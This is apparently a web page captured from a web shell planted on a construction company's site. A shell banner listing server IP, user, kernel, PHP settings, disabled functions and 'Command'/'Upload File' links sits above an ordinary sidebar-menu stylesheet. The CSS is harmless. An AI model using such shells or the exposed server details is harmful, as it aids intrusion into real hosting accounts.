Server IP : 153.92.220.142 / Your IP : 216.73.216.7 Web Server : LiteSpeed System : Linux nl-srv-web513.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64 User : u444427800 ( 444427800) PHP Version : 8.1.32 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u444427800/domains/aasthaconstruction.in/public_html/css/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
/************************************************************ * Push Sidebar Menu * * Created on: March 3,2015 * License : MIT * Author : Amr Mekkawy <amr.mekkawy@gmail.com> * URL : http://github.com/AmrMekkawy/push-sidebar-menu ************************************************************/ .nav_trigger { cursor: pointer; display: inline-block; font-size: 26px; margin: 5px 20px 0 50px; float:right; } body.show_sidebar .nav_trigger { margin-right: 5px; } #push_sidebar { background: #31373d; border-left: 1px solid #ddd; bottom: 0; color: #95A7B7; left: 100%; overflow: auto; position: fixed; top: 0; width: 25%; -webkit-transition: all .5s ease; -moz-transition: all .5s ease; -ms-transition: all .5s ease; -o-transition: all .5s ease; transition: all .5s ease; } body.show_sidebar #push_sidebar { left: 75%; } #wrapper { margin-right: 0; min-height: 1000px; overflow: hidden; width: 100%; -webkit-transition: all .5s ease; -moz-transition: all .5s ease; -ms-transition: all .5s ease; -o-transition: all .5s ease; transition: all .5s ease; } body.show_sidebar #wrapper { margin-right: 25%; width: 75%; } @media (max-width: 767px) { .nav_trigger { font-size: 19px; margin: 5px 5px 0 20px; } #push_sidebar { width: 80%; } body.show_sidebar #push_sidebar { left: 20%; } body.show_sidebar #wrapper { margin-right: 80%; width: 20%; } } @media (min-width: 992px) { #push_sidebar { width: 20%; } body.show_sidebar #push_sidebar { left: 80%; } body.show_sidebar #wrapper { margin-right: 20%; width: 80%; } } /***********************************/ #push_sidebar li a { padding: 10px 15px 10px 5px; display: block; font: 13px Tahoma, Arial, serif; background: #31373d; color: #95A7B7; text-decoration: none; border-bottom: 1px solid #3D454C; } #push_sidebar li a:hover { background-color: #272c30; color:#95a7b7 } #push_sidebar li a .fa { font-size: 19px; float: right; width: 30px; text-align: center; margin-left: 5px; } .what-we-do p { font-size: large; } .qoate h2 { font-style: italic; font-size: revert; font-family: sans-serif; } .vision-img{ background: #f5f2cd; height: 162px; padding: 9px; } .vision-img img{ width: 226px; float: left; } .vision-img li{ font-size: large; margin-left: 272px; margin-top: 37px; } .mission-img img{ width: 226px; float: right; } .mission-img p{ font-size: large; margin-top: 76px; margin-left: 121px; } .mission-img{ background: #f5f4f4; height: 166px; padding: 1px; margin-top: 33px; } .quality-policy{ margin-top: 30px; } .quality-policy li { font-size: medium; text-decoration: none; display: list-item; } .corevalue{ margin-top: 30px; } .corevalue img{ width: 407px; float: left; margin: 9px; } .corevalue li{ font-size: medium; text-decoration: none; margin-left: 463px; display: list-item;; } .corevalue ul{ margin-top: 38px; padding: 15px; }